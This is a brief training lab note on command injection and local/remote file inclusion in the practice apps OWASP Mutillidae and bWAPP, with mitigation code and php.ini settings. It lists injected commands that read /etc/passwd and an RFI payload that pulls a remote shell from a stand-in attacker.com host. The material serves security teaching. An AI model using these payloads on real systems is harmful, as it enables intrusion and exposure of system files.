Command Injection & RFI/LFI

Practice on exploiting and mitigating command injection and local/remote file inclusion (LFI/RFI) vulnerabilities using OWASP Mutillidae and bWAPP.

1. Command Injection

Access OWASP Mutillidae → OWASP 2013 → A1 Injection → DNS Lookup. Inject OS commands using ; or |:

pwd
cat /etc/passwd
ls -la
ls /etc/apache2/

2. Countermeasures

<?php
if ($targetIP = filter_input(INPUT_GET, 'ip', FILTER_VALIDATE_IP)) {
    $cmd = exec("ping $targetIP");
} else {
    die("Please provide a valid IP address");
}
?>

• Avoid exec(), shell_exec(), system(), passthru()
• Use whitelist validation
• Use built-in PHP functions instead of OS commands

3. LFI / RFI

?language=/etc/passwd
?language=/etc/hostname
?language=http://attacker.com/shell.txt&comando=id

4. Countermeasures

; php.ini
allow_url_include = Off
allow_url_fopen   = Off

• Use a whitelist map instead of raw user input for file names
• Restrict write permissions on server directories